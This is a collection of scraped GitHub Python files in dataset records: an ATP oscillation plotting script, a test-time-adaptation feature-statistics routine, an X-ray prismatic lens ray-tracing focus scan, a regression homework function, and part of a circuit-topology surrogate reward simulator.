\"Data\")\nsetlimFreq = 250\nsetlimAmp = 25\natpmax = 10\nthr = {\n \"glc_poor\": {\n \"sample1\": 3.46927206,\n \"sample2\": 3.46927206,\n \"sample3\": 3.46927206,\n },\n \"glc_rich\": {\n \"sample1\": 3.46927206,\n \"sample2\": 3.46927206,\n \"sample3\": 3.46927206,\n }\n}\n\nallAmps = {}\nallFreqs = {}\nallCAmps = {}\nallCfreqs = {}\n\nfor cond in conds:\n sampleDFs = {}\n sampleDFs2 = {}\n\n for i in range(1, 4):\n dfPath = os.path.join(root, cond, \"sample\" + str(i), \"atpAmp.csv\")\n dfPath2 = os.path.join(root, cond, \"sample\" + str(i), \"atpFreq.csv\")\n print(dfPath)\n\n if os.path.isfile(dfPath) and os.path.isfile(dfPath2):\n print(dfPath)\n sampleDFs[\"sample\" + str(i)] = pd.read_csv(dfPath)\n\n sampleDFs2[\"sample\" + str(i)] = pd.read_csv(dfPath2)\n allAmps[cond] = sampleDFs\n allFreqs[cond] = sampleDFs2\n\nfor mode in modes:\n for cond in conds:\n condAmp = None\n tmp = allAmps[cond]\n atpClass = []\n\n for sample in sorted(tmp.keys()):\n if sample == 'sample1':\n condAmp = tmp[sample].copy()\n else:\n condAmp = pd.concat([condAmp, tmp[sample]])\n\n 
for atp in tmp[sample][mode + 'ATP']:\n                if atp >= thr[cond][sample]:\n                    name = \"high\"\n                else:\n                    name = \"low\"\n                atpClass.append(name)\n\n        condAmp['ClassATP'] = atpClass\n        maxmed = abs(condAmp['maxATP'] - condAmp['medianATP'])\n        minmed = abs(condAmp['minATP'] - condAmp['medianATP'])\n        condAmp['diffATP'] = pd.DataFrame(\n            np.where(maxmed > minmed, maxmed, minmed))\n        print([maxmed, minmed, condAmp[mode + 'ATP']])\n\n        condFreq = None\n        tmp = allFreqs[cond]\n\n        for sample in sorted(tmp.keys()):\n            if sample == 'sample1':\n                condFreq = tmp[sample].copy()\n            else:\n                condFreq = pd.concat([condFreq, tmp[sample]])\n        condFreq['diffATP'] = condAmp[mode + 'ATP']\n        condFreq['ClassATP'] = condAmp['ClassATP']\n\n        #plt.scatter(condAmp['ClassATP'],condAmp['maxAmp'])\n        plt.boxplot([\n            condAmp[condAmp['ClassATP'] == \"high\"]['maxAmp'],\n            condAmp[condAmp['ClassATP'] == \"low\"]['maxAmp']\n        ],\n                    labels=['high', 'low'])\n        r, pvalue = stats.mannwhitneyu(\n            condAmp[condAmp['ClassATP'] == \"high\"]['maxAmp'],\n            condAmp[condAmp['ClassATP'] == \"low\"]['maxAmp'],\n            alternative='two-sided')\n        plt.title(cond + \" p: \" + str(pvalue))\n        plt.ylim((0, setlimAmp))\n        plt.xlabel('ATP Class')\n        plt.ylabel('Maximum Amplitude')\n        plt.savefig(\n            os.path.join(root, 'Total', cond + \"_\" + mode + \"ClassAmp.pdf\"))\n        plt.show()\n\n        #plt.scatter(condFreq['ClassATP'],condFreq['maxFreq'])\n        plt.boxplot([\n            condFreq[condFreq['ClassATP'] == \"high\"]['maxFreq'],\n            condFreq[condFreq['ClassATP'] == \"low\"]['maxFreq']\n        ],\n                    labels=['high', 'low'])\n        r, pvalue = stats.mannwhitneyu(\n            condFreq[condFreq['ClassATP'] == \"high\"]['maxFreq'],\n            condFreq[condFreq['ClassATP'] == \"low\"]['maxFreq'],\n            alternative='two-sided')\n        plt.title(cond + \" p: \" + str(pvalue))\n        plt.ylim((0, setlimFreq))\n        plt.xlabel('ATP Class')\n        plt.ylabel('Maximum Frequency')\n\n        plt.savefig(\n            os.path.join(root, 'Total', cond + \"_\" + mode + \"ClassFreq.pdf\"))\n        plt.show()\n","repo_name":"funalab/pyCellLineage","sub_path":"Data/SuplFigCode/Osscilatory_PlotSample.py","file_name":"Osscilatory_PlotSample.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} {"seq_id":"38750280033","text":"import torch\nfrom discrepancy import *\n\n\ndef offline(trloader, ext, classifier, head, class_num=10):\n    ext.eval()\n    \n    feat_stack = [[] for i in range(class_num)]\n    ssh_feat_stack = [[] for i in range(class_num)]\n\n    with torch.no_grad():\n        for batch_idx, (inputs, labels) in enumerate(trloader):\n\n            feat = ext(inputs.cuda())\n            predict_logit = classifier(feat)\n            ssh_feat = head(feat)\n            \n            pseudo_label = predict_logit.max(dim=1)[1]\n\n            for label in pseudo_label.unique():\n                label_mask = pseudo_label == label\n                feat_stack[label].extend(feat[label_mask, :])\n                ssh_feat_stack[label].extend(ssh_feat[label_mask, :])\n    ext_mu = []\n    ext_cov = []\n    ext_all = []\n\n    ssh_mu = []\n    ssh_cov = []\n    ssh_all = []\n    for feat in feat_stack:\n        ext_mu.append(torch.stack(feat).mean(dim=0))\n        ext_cov.append(covariance(torch.stack(feat)))\n        ext_all.extend(feat)\n    \n    for feat in ssh_feat_stack:\n        ssh_mu.append(torch.stack(feat).mean(dim=0))\n        ssh_cov.append(covariance(torch.stack(feat)))\n        ssh_all.extend(feat)\n    \n    ext_all = torch.stack(ext_all)\n    ext_all_mu = ext_all.mean(dim=0)\n    ext_all_cov = covariance(ext_all)\n\n    ssh_all = torch.stack(ssh_all)\n    ssh_all_mu = ssh_all.mean(dim=0)\n    ssh_all_cov = covariance(ssh_all)\n    return ext_mu, ext_cov, ssh_mu, ssh_cov, ext_all_mu, ext_all_cov, ssh_all_mu, 
ssh_all_cov\n","repo_name":"Gorilla-Lab-SCUT/TTAC","sub_path":"cifar/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"6"} +{"seq_id":"13575710532","text":"from typing import List\nfrom xrt.backends.raycing.sources import GeometricSource, Beam\nfrom xrt.backends.raycing import BeamLine\nfrom xrt.backends.raycing.materials import Material\nfrom database.PrismaticLens import PrismaticLens\nfrom xrt.backends.raycing.screens import Screen\nfrom xrt.plotter import XYCAxis, XYCPlot\nfrom xrt.backends.raycing import get_x, get_z, get_xprime, get_zprime\nfrom utilits.xrtutils import get_integral_breadth, bell_fit\nimport xrt.backends.raycing.materials as rm\n\nimport xrt.backends.raycing.run as rrun\nimport xrt.runner as xrtrun\n\nimport numpy as np\nimport os\nimport shutil\nimport pickle\n\nimport matplotlib as mpl\n\nmpl.use('agg')\n\ndata_dir = os.path.join(r\"C:\\Users\\synchrotron\\PycharmProjects\\SKIF\", 'prism_fixed_focus','datasets', 'tmp')\ndata_dir0 = os.path.join(r\"C:\\Users\\synchrotron\\PycharmProjects\\SKIF\", 'prism_fixed_focus','datasets', 'tmp')\n\ncrl_mat = Material('Be', rho=1.848, kind='lens')\ncrl_y_t = 1.2 # 0.6588 # mm\ncrl_y_g = 1.2 # 0.6588 # mm\ncrl_L = 270. # 82.242 # mm\nen = 30000. # eV\n\nfocal_dist = 14000. # mm\nfocal_dist_calc = crl_y_g * crl_y_t / (crl_L * np.real(1. - crl_mat.get_refractive_index(en)))\n# focal_dist = focal_dist_calc\n\n\nclass CrocTestBL(BeamLine):\n def __init__(self, azimuth=0, height=0, alignE='auto'):\n super().__init__(azimuth, height, alignE)\n\n self.name = 'Croc Lens Test BL'\n\n self.GS = GeometricSource(\n name=r\"Gaussian Source\",\n bl=self,\n nrays=10000,\n center=[0, 0, 0],\n distE='lines',\n energies=[en],\n distx='normal',\n disty='flat',\n distz='normal',\n distxprime='flat',\n distzprime='flat',\n dx=.455,\n dy=0.,\n dz=.027,\n dxprime=1e-3,\n dzprime=1e-4\n )\n\n self.LensMat = crl_mat\n print('2F-2F geometry, F = %.01f' % focal_dist)\n print(*[': '.join((str(a), '%.03f' % b)) for a, b in\n PrismaticLens.calc_optimal_params(self.LensMat, focal_dist, en).items()])\n\n self.LensStack = PrismaticLens.make_stack(\n L=crl_L, N=int(crl_L), d=crl_y_t, g_last=0.0, g_first=crl_y_g,\n bl=self,\n center=[0., 2. * focal_dist, 0],\n material=self.LensMat,\n limPhysX=[-100., 100.],\n limPhysY=[-20., 20.],\n )\n\n self.SourceScreen = Screen(\n bl=self,\n name=r\"Source\",\n center=[0, 1., 0],\n )\n self.PreLensScreen = Screen(\n bl=self,\n name=r\"Before lens\",\n center=[0, 2. * focal_dist - 1., 0],\n )\n self.PostLensScreen = Screen(\n bl=self,\n name=r\"After lens\",\n center=[0, 2. * focal_dist + crl_L + 1., 0],\n )\n self.FocusingScreen = Screen(\n bl=self,\n name=r\"Focus\",\n center=[0, 4. * focal_dist, 0],\n )\n self.FScreenStack = []\n self.reset_screen_stack()\n\n def reset_screen_stack(self, y_min=2.1 * focal_dist, y_max=6 * focal_dist, stack_size=20):\n del self.FScreenStack[:]\n self.FScreenStack = [\n Screen(bl=self, name=r\"FSS %.03f\" % y_pos, center=[0, y_pos, 0])\n for y_pos in np.linspace(y_min, y_max, stack_size)\n ]\n\n def reset_LensStack(self, newG ):\n del self.LensStack[:]\n self.LensStack = PrismaticLens.make_stack(\n L=crl_L, N=int(crl_L), d=crl_y_t, g_last=0.0, g_first=newG,\n bl=self,\n center=[0., 2. 
* focal_dist, 0],\n material=self.LensMat,\n limPhysX=[-100., 100.],\n limPhysY=[-20., 20.],\n )\n\n\ndef run_process(bl: CrocTestBL):\n outDict = dict()\n\n outDict['BeamSourceGlobal'] = bl.GS.shine()\n outDict['BeamM1Local'] = bl.SourceScreen.expose(beam=outDict['BeamSourceGlobal'])\n outDict['BeamM2Local'] = bl.PreLensScreen.expose(beam=outDict['BeamSourceGlobal'])\n\n beamIn = outDict['BeamSourceGlobal']\n for ilens, lens in enumerate(bl.LensStack):\n lglobal, llocal1, llocal2 = lens.double_refract(beamIn, needLocal=True)\n strl = '_{0:02d}'.format(ilens)\n outDict['BeamLensGlobal' + strl] = lglobal\n outDict['BeamLensLocal1' + strl] = llocal1\n outDict['BeamLensLocal2' + strl] = llocal2\n\n llocal2a = Beam(copyFrom=llocal2)\n llocal2a.absorb_intensity(beamIn)\n outDict['BeamLensLocal2a' + strl] = llocal2a\n beamIn = lglobal\n\n outDict['BeamM3Local'] = bl.PostLensScreen.expose(beam=beamIn)\n outDict['BeamM4Local'] = bl.FocusingScreen.expose(beam=beamIn)\n\n for iscreen, screen in enumerate(bl.FScreenStack):\n outDict['BeamFSSLocal_{0:02d}'.format(iscreen)] = screen.expose(beam=beamIn)\n\n bl.prepare_flow()\n return outDict\n\n\nrrun.run_process = run_process\n\n# поделить на 4\n\nfocus_dict = []\n\n\ndef empty_scan(bl: CrocTestBL, plots: List):\n def slice_parabola(a, b, c, m):\n m += 1.\n x0 = -b / (2. * c)\n a_ = a + m * (b * b / (4 * c) - a)\n d = np.sqrt(b * b - 4 * a_ * c)\n x1 = (-b - d) / (2. * c)\n x2 = (-b + d) / (2. * c)\n return x0, x1, x2\n\n ymin, ymax = 2.1 * focal_dist, 6. * focal_dist\n for _ in range(4):\n if os.path.exists(data_dir):\n shutil.rmtree(data_dir)\n os.mkdir(data_dir)\n\n bl.reset_screen_stack(y_min=ymin, y_max=ymax)\n for ii in range(len(plots) - 1, -1, -1):\n if 'BeamFSSLocal' in plots[ii].title:\n del plots[ii]\n\n plots.extend([\n XYCPlot(\n beam='BeamFSSLocal_{0:02d}'.format(iscreen),\n title='BeamFSSLocal_{0:02d}'.format(iscreen),\n persistentName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1]),\n saveName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.png' % screen.center[1]),\n aspect='auto',\n xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n yaxis=XYCAxis(label='$z$', unit='mm', data=get_z, limits=[-.5, .5]))\n for iscreen, screen in enumerate(bl.FScreenStack)\n ])\n\n yield\n\n # calculating focus position and size\n pos, y_size = [], []\n for f_name in (os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1])\n for screen in bl.FScreenStack):\n with open(f_name, 'rb') as f:\n y_size.append(get_integral_breadth(pickle.load(f), 'y'))\n pos.append(float(os.path.basename(f_name).replace('.pickle', '').replace('BeamFSSLocal_', '')))\n else:\n pos, y_size = np.array(pos), np.array(y_size)\n ii = np.argsort(pos)\n pos, y_size = pos[ii], y_size[ii]\n\n pp = np.polynomial.polynomial.Polynomial.fit(pos, y_size, 2)\n coef = pp.convert().coef\n focus, ymin, ymax = slice_parabola(*coef, 0.1)\n fig = mpl.pyplot.figure()\n ax = fig.add_subplot()\n ax.plot(pos, y_size)\n ax.plot(pos, pp(pos))\n ax.plot([focus, focus], [y_size.min(), y_size.max()], '--')\n ax.text(focus, y_size.max(), 'F=%.01f mm' % focus)\n fig.savefig(os.path.join(data_dir, '..', f'crl_y_t {crl_y_t} {en}eV_fdist%d.png' % _))\n\n focus_dict.append(focus / 4)\n # calculating gain\n focus_size = coef[0] - coef[1] ** 2 / (4. 
* coef[2])\n            with open(f_name, 'rb') as f:\n                f = pickle.load(f)\n            focus_flux = f.intensity\n            with open(os.path.join(data_dir, 'BeamAtSource.pickle'), 'rb') as f:\n                f = pickle.load(f)\n            source_flux = f.intensity\n            source_size = get_integral_breadth(f, 'y')\n\n            source_projection = source_size + 2. * focus * 1e-4\n            print('Focus | size: %.03f | flux %.01f | distance %.01f' % (focus_size, focus_flux, focus))\n            print('Source | size: %.03f | flux %.01f' % (source_size, source_flux))\n            print('Projected source size: %.03f' % source_projection)\n            print('Gain %.01f' % ((focus_flux * source_projection) / (source_flux * focus_size)))\n\ndel_focus=[]\ndef yg_scan(bl: CrocTestBL, plots: List):\n    focal_dist=14000\n    def slice_parabola(a, b, c, m):\n        m += 1.\n        x0 = -b / (2. * c)\n        a_ = a + m * (b * b / (4 * c) - a)\n        d = np.sqrt(b * b - 4 * a_ * c)\n        x1 = (-b - d) / (2. * c)\n        x2 = (-b + d) / (2. * c)\n        return x0, x1, x2\n    newG=round(focal_dist *crl_L/crl_y_t*np.real(1. - crl_mat.get_refractive_index(en)),3)\n    bl.reset_LensStack(newG)\n    # ymin, ymax = 2.1 *focal_dist, 6. * focal_dist\n\n    for _ in range(20):\n        ymin, ymax = 54000,58000\n        if os.path.exists(data_dir):\n            shutil.rmtree(data_dir)\n        os.mkdir(data_dir)\n\n        bl.reset_screen_stack(y_min=ymin, y_max=ymax, stack_size=100)\n\n        for ii in range(len(plots) - 1, -1, -1):\n            if 'BeamFSSLocal' in plots[ii].title:\n                del plots[ii]\n\n        plots.extend([\n            XYCPlot(\n                beam='BeamFSSLocal_{0:02d}'.format(iscreen),\n                title='BeamFSSLocal_{0:02d}'.format(iscreen),\n                persistentName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1]),\n                saveName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.png' % screen.center[1]),\n                aspect='auto',\n                xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n                yaxis=XYCAxis(label='$z$', unit='mm', data=get_z, limits=[-.5, .5]))\n            for iscreen, screen in enumerate(bl.FScreenStack)\n        ])\n\n        yield\n\n        # calculating focus position and size\n        pos, y_size = [], []\n        for f_name in (os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1])\n                       for screen in bl.FScreenStack):\n            with open(f_name, 'rb') as f:\n                y_size.append(get_integral_breadth(pickle.load(f), 'y'))\n            pos.append(float(os.path.basename(f_name).replace('.pickle', '').replace('BeamFSSLocal_', '')))\n        else:\n            pos, y_size = np.array(pos), np.array(y_size)\n            ii = np.argsort(pos)\n            pos, y_size = pos[ii], y_size[ii]\n\n        pp = np.polynomial.polynomial.Polynomial.fit(pos, y_size, 2)\n        coef = pp.convert().coef\n        realfocus, ymin, ymax = slice_parabola(*coef, 0.1)\n        del_focus.append(4*focal_dist-realfocus)\n\n        fig = mpl.pyplot.figure()\n        ax = fig.add_subplot()\n        ax.plot(pos, y_size)\n        ax.plot(pos, pp(pos))\n        ax.set_xlabel(\"E , eV\")\n        ax.set_ylabel(\"y_size, mm\")\n        ax.plot([realfocus, realfocus], [y_size.min(), y_size.max()], '--')\n        ax.text(realfocus, y_size.max(), 'F=%.01f mm' % realfocus)\n        mpl.pyplot.title(label=f'y_g={newG} mm, energy {en}')\n        fig.savefig(os.path.join(data_dir, '..', f'crl_y_g {newG} {en}eV_fdist%d.png' % _))\n        print(f'Energy {en} eV')\n        print(f'newG {newG} mm')\n        print(f'del_focus={del_focus[_]} mm')\n        print(f'abs(focal_dist-real_focus)/focal_dist={abs(del_focus[_]) / (4*focal_dist)}')\n        if abs(del_focus[_]/(4*focal_dist))<=0.01:\n\n            break\n\n        # ymin, ymax = realfocus - 2 * (abs(del_focus[_])), realfocus - 2 * (abs(del_focus[_]))\n        newG=round(newG*(1+(del_focus[_])/(4*focal_dist)),3)\n        bl.reset_LensStack(newG)\n\n    focus_dict.append(realfocus)\n    print(f' Focal distance {focal_dist} mm at {en} eV and y_g={newG} mm')\n    # calculating gain\n    focus_size = coef[0] - coef[1] ** 2 / (4. * coef[2])\n    with open(f_name, 'rb') as f:\n        f = pickle.load(f)\n    focus_flux = f.intensity\n    with open(os.path.join(data_dir, 'BeamAtSource.pickle'), 'rb') as f:\n        f = pickle.load(f)\n    source_flux = f.intensity\n    source_size = get_integral_breadth(f, 'y')\n\n    source_projection = source_size + 2. * realfocus * 1e-4\n    print('Focus | size: %.03f | flux %.01f | distance %.01f' % (focus_size, focus_flux, realfocus))\n    print('Source | size: %.03f | flux %.01f' % (source_size, source_flux))\n    print('Projected source size: %.03f' % source_projection)\n    print('Gain %.01f' % ((focus_flux * source_projection) / (source_flux * focus_size)))\n\n\nif __name__ == '__main__':\n    Emap = np.linspace(20000, 80000, 10)\n    crl_y_t_map = np.linspace(0.5, 5, 10)\n    focus_formula = []\n    for tempE in Emap:\n        en=round(tempE,3)\n        # crl_y_t = temp_crl_y_t\n        # focal_dist_calc = crl_y_g * crl_y_t / (crl_L * np.real(1. - crl_mat.get_refractive_index(en)))\n        # focal_dist = focal_dist_calc\n        data_dir = os.path.join(data_dir0, f'dependence on en-{en}')\n        if os.path.exists(data_dir):\n            shutil.rmtree(data_dir)\n        os.mkdir(data_dir)\n        plots = [\n            XYCPlot(beam='BeamM1Local', title='source', aspect='auto',\n                    xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n                    yaxis=XYCAxis(label='$z$', unit='mm', data=get_z),\n                    persistentName=os.path.join(data_dir, 'BeamAtSource.pickle')),\n            XYCPlot(beam='BeamM2Local', title='before_lens', aspect='auto',\n                    xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n                    yaxis=XYCAxis(label='$z$', unit='mm', data=get_z)),\n            XYCPlot(beam='BeamM3Local', title='after_lens', aspect='auto',\n                    xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n                    yaxis=XYCAxis(label='$z$', unit='mm', data=get_z)),\n            XYCPlot(beam='BeamM3Local', title='focal_point', aspect='auto',\n                    xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n                    yaxis=XYCAxis(label='$z$', unit='mm', data=get_z))\n        ]\n        beamline = CrocTestBL()\n        scan = yg_scan\n        show = False\n        repeats = 1\n\n        if show:\n            beamline.glow(\n                scale=[1e1, 1e4, 1e4],\n                centerAt=r'Lens_03_Exit',\n                generator=scan,\n                generatorArgs=[beamline, plots],\n                startFrom=1\n            )\n        else:\n            xrtrun.run_ray_tracing(\n                beamLine=beamline,\n                plots=plots,\n                repeats=repeats,\n                backend=r\"raycing\",\n                generator=scan,\n                generatorArgs=[beamline, plots]\n            )\n\n        focus_formula.append(focal_dist_calc)\n    fig = mpl.pyplot.figure()\n    ax = fig.add_subplot()\n    ax.set_xlabel(\"E , eV\")\n    ax.set_ylabel(\"Focal distance, mm\")\n    ax.plot(Emap, focus_dict, 'x', label='xrt')\n    ax.plot(Emap, [56000 for i in range(len(Emap))], label='analytic')\n    ax.legend()\n    fig.savefig(os.path.join(data_dir, '..', 'focus(E ).png'))","repo_name":"Kutkin-Oleg/SKIF","sub_path":"Playground/prysm_fixed_focus.py","file_name":"prysm_fixed_focus.py","file_ext":"py","file_size_in_byte":14803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"41645715338","text":"#!/usr/bin/env python3\n\n# James Jessen\n# CptS 434 - Assignment 4\n# Due 2019-10-01\n\nimport pandas as pd\nimport numpy as np\n\ndef perceptronClassification(dataPath, inputColumns, classColumn):\n    # print(\"Input Columns: {}\".format(inputColumns))\n    # print(\"Class Column: {}\".format(classColumn))\n\n    columns = inputColumns.copy()\n    columns.append(classColumn)\n\n    # Read data from file\n    # Read CSV: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html\n    # DataFrame: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html\n    data = 
pd.read_csv(dataPath, usecols=columns)\n\n data.loc['actual']\n data.loc['predicted']\n\n numInputs = len(inputColumns)\n numRows = len(data.index)\n\n V = np.ones((numRows, 1 + numInputs)) # First column ones for bias node\n V[:,1:] = data.iloc[:,inputColumns].values\n \n classifications = data.iloc[:,classColumn].values\n\n # Solve the normal equation\n w = np.linalg.solve(V.T.dot(V), V.T.dot(classifications))\n\n fits = V.dot(w)\n yAvg = np.mean(classifications)\n\n # Sum of Squares Regression\n # Measures variability of fit from mean response.\n ssrDiff = fits - yAvg\n SSR = np.sum(ssrDiff.dot(ssrDiff))\n\n # Sum of Squares Error\n # Measures variability of response from all other sources after the linear relationship \n # between response and attributes has been accounted for.\n residuals = classifications - fits # Deviations predicted from actual empirical values of data\n SSE = np.sum(residuals.dot(residuals))\n\n # Sum of Squares Total \n # The sum of the squared differences of each observation from the overall mean.\n # Identity: SST = SSR + SSE\n delY = classifications - yAvg\n SST = np.sum(delY.dot(delY))\n\n # Coefficient of Determination\n # Interpreted as the fraction of the total variation of response over \n # the dataset that is explained by the linear fit.\n rSq = SSR / SST\n # Always increases when an additional attribute is included.\n # To be useful, a new attribute must significantly increase R2.\n\n # Mean Squared Error\n MSE = SSE / (numRows - numInputs - 1)\n\n # Standard Error of Estimation\n # Interpreted as the typical size of residuals \n s = np.sqrt(MSE)\n # Can be lower or higher when another attribute is added to the model.\n\n return classifications, fits, rSq","repo_name":"jsjessen/434_NeuralNetworks","sub_path":"4hw/PerceptronClassification.py","file_name":"PerceptronClassification.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27815647970","text":"import copy\nfrom abc import abstractmethod, ABC\n\nimport config\n\nif config.task == 'uct_3_comp':\n from UCFTopo_dev.ucts.TopoPlanner import TopoGenSimulator, calculate_reward, sort_dict_string\nelif config.task == 'uct_5_comp':\n from UCT_5_UCB_unblc_restruct_DP_v1.ucts.TopoPlanner import TopoGenSimulator, calculate_reward, sort_dict_string\n from UCT_5_UCB_unblc_restruct_DP_v1.SimulatorAnalysis.gen_topo import key_circuit_from_lists, convert_to_netlist\n\nfrom topo_data_util.analysis.topoGraph import TopoGraph\nfrom topo_data_util.analysis.graphUtils import nodes_and_edges_to_adjacency_matrix\n\n\nclass SurrogateRewardTopologySim(TopoGenSimulator, ABC):\n def __init__(self, debug, *args):\n self.debug = debug\n # for fair comparison with simulator, create a hash table here\n self.surrogate_hash_table = {}\n self.no_isom_seen_state_list = []\n\n super().__init__(*args)\n\n def find_paths(self):\n \"\"\"\n Useful for GP and transformer based surrogate model\n Return the list of paths in the current state\n e.g. 
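The PerceptronClassification.py record above computes SSR, SSE, SST and R² after solving the normal equation (note the two bare `data.loc['actual']`/`data.loc['predicted']` lines there are no-ops). A compact check of that bookkeeping on invented data, confirming the identity SST = SSR + SSE mentioned in the record's comments:

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 3))
y = X @ np.array([1.5, -2.0, 0.5]) + rng.normal(scale=0.1, size=50)

V = np.column_stack([np.ones(len(X)), X])    # bias column, as in the record
w = np.linalg.solve(V.T @ V, V.T @ y)        # normal equation
fits = V @ w

SSR = np.sum((fits - y.mean()) ** 2)         # variability explained by the fit
SSE = np.sum((y - fits) ** 2)                # residual variability
SST = np.sum((y - y.mean()) ** 2)            # total variability
print(np.isclose(SST, SSR + SSE))            # True -- holds for fits with an intercept
print("R^2 =", SSR / SST)
```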
['VIN - inductor - VOUT', ...]\n \"\"\"\n node_list, edge_list = self.get_state().get_nodes_and_edges()\n\n adjacency_matrix = nodes_and_edges_to_adjacency_matrix(node_list, edge_list)\n\n # convert graph to paths, and find embedding\n topo = TopoGraph(adj_matrix=adjacency_matrix, node_list=node_list, new_repr=True)\n return topo.find_end_points_paths_as_str()\n\n def get_topo_key(self, state=None):\n \"\"\"\n the key of topology used by hash table\n\n :return: the key representation of the state (self.current if state == None)\n \"\"\"\n if state is None:\n state = self.get_state()\n\n if config.task == 'uct_3_comp':\n topo_key = sort_dict_string(state.graph)\n elif config.task == 'uct_5_comp':\n list_of_node, list_of_edge, netlist, joint_list = convert_to_netlist(state.graph,\n state.component_pool,\n state.port_pool,\n state.parent,\n state.comp2port_mapping)\n topo_key = key_circuit_from_lists(list_of_edge, list_of_node, netlist)\n else:\n raise Exception()\n\n return topo_key\n\n def get_reward(self, state=None):\n if not self.configs_['sweep']:\n return self.get_no_sweep_reward()\n else:\n return self.get_sweep_reward_with_para()\n\n def get_no_sweep_reward(self):\n reward = self.get_reward_using_gnn()\n return reward\n\n def get_sweep_reward_with_para(self):\n tmp_para = -1\n tmp_max_reward = -1\n for duty_cycle in self.candidate_duty_cycles:\n self.current.parameters = duty_cycle\n reward = self.get_reward_using_gnn()\n if tmp_max_reward < reward:\n tmp_max_reward = reward\n tmp_para = duty_cycle\n self.current.parameters = tmp_para\n return tmp_max_reward\n\n def get_reward_using_gnn(self, state=None):\n \"\"\"\n Use surrogate reward function\n imp-wise, not sure why keeping a reward attribute\n \"\"\"\n\n if state is not None:\n self.set_state(None, None, state)\n\n if not self.is_terminal():\n self.current.parameters = -1\n self.reward = 0\n return self.reward\n\n if not self.current.graph_is_valid():\n self.current.parameters = -1\n self.reward = 0\n self.effi = 0\n self.vout = -500\n return self.reward\n\n topo_key = self.get_topo_key()\n if topo_key + '$' + str(self.current.parameters) in self.surrogate_hash_table:\n self.hash_counter += 1\n return self.surrogate_hash_table[topo_key + '$' + str(self.current.parameters)]\n else:\n if self.configs_['skip_sim'] and \\\n (topo_key + '$' + str(self.current.parameters) not in self.key_sim_effi_):\n reward = 0\n effi_info = {'efficiency': 0, 'Vout': 500}\n tmp_para = self.current.parameters\n eff = effi_info['efficiency']\n vout = effi_info['Vout']\n parameter = self.current.parameters\n print('skip as not in sim hash')\n else:\n\n # eff = self.get_surrogate_eff(self.get_state())\n # vout = self.get_surrogate_vout(self.get_state())\n eff, vout, reward, parameter = self.get_surrogate_reward(self.get_state())\n # reward_sim, effi_sim, vout_sim = self.get_true_performance(self.get_state())\n # print('gnn effi:', eff, ' vout:', vout, ' reward:', reward)\n # print('simulation effi:', effi_sim, ' vout:', vout_sim, ' reward:', reward_sim)\n # # an object for computing reward\n # eff_obj = {'efficiency': eff,\n # 'output_voltage': vout}\n\n self.query_counter += 1\n self.reward = reward\n\n if self.debug:\n print('estimated reward {}, eff {}, vout {}'.format(self.reward, eff, vout))\n print('true performance {}'.format(self.get_true_performance()))\n\n self.surrogate_hash_table[topo_key + '$' + str(self.current.parameters)] = self.reward\n print(topo_key, eff, vout, reward, parameter)\n if self.configs_['sweep']:\n 
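The surrogateRewardSim.py record above caches every surrogate query under the key `topo_key + '$' + str(parameters)` and sweeps candidate duty cycles, keeping the best reward. A minimal sketch of that pattern; `reward_fn`, the key string, and the toy surrogate are placeholders:

```python
def sweep_best_reward(topo_key, candidate_duty_cycles, reward_fn, cache):
    best_reward, best_param = -1.0, -1
    for duty_cycle in candidate_duty_cycles:
        key = topo_key + "$" + str(duty_cycle)
        if key not in cache:                  # query the surrogate once per key
            cache[key] = reward_fn(topo_key, duty_cycle)
        if cache[key] > best_reward:
            best_reward, best_param = cache[key], duty_cycle
    return best_reward, best_param

cache = {}
reward, duty = sweep_best_reward(
    "VIN-L-VOUT", [0.1, 0.3, 0.5, 0.7, 0.9],
    lambda _, d: 1.0 - abs(d - 0.5),          # toy surrogate peaking at d = 0.5
    cache,
)
print(reward, duty)    # 1.0 0.5; a second call with the same keys hits the cache
```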
self.update_topk(topo_key)\n else:\n self.update_topk_topology_with_para(topo_key + '$' + str(self.current.parameters))\n self.no_isom_seen_state_list.append(copy.deepcopy(self.current))\n\n return self.reward\n\n @abstractmethod\n def get_surrogate_eff(self, state):\n \"\"\"\n return the eff prediction of state, and of self.get_state() if None\n \"\"\"\n pass\n\n @abstractmethod\n def get_surrogate_vout(self, state):\n \"\"\"\n return the vout prediction of state, and of self.get_state() if None\n \"\"\"\n pass\n\n def get_surrogate_reward(self, state):\n \"\"\"\n return the vout prediction of state, and of self.get_state() if None\n \"\"\"\n pass\n\n def get_true_performance(self, state=None):\n if not self.configs_['sweep']:\n return self.get_no_sweep_true_performance(state)\n else:\n return self.get_sweep_true_performance_with_para(state)\n\n def get_no_sweep_true_performance(self, state=None):\n reward, eff, vout = self.get_true_performance_of_sim(state)\n return reward, eff, vout\n\n def get_sweep_true_performance_with_para(self, state=None):\n tmp_para = -1\n tmp_max_reward = -1\n tmp_max_eff = -1\n tmp_max_vout = -500\n for duty_cycle in self.candidate_duty_cycles:\n state.parameters = duty_cycle\n reward, eff, vout = self.get_true_performance_of_sim(state)\n if tmp_max_reward < reward:\n tmp_max_reward = reward\n tmp_para = duty_cycle\n tmp_max_eff = eff\n tmp_max_vout = vout\n self.current.parameters = tmp_para\n return tmp_max_reward, tmp_max_eff, tmp_max_vout\n\n def get_true_performance_of_sim(self, 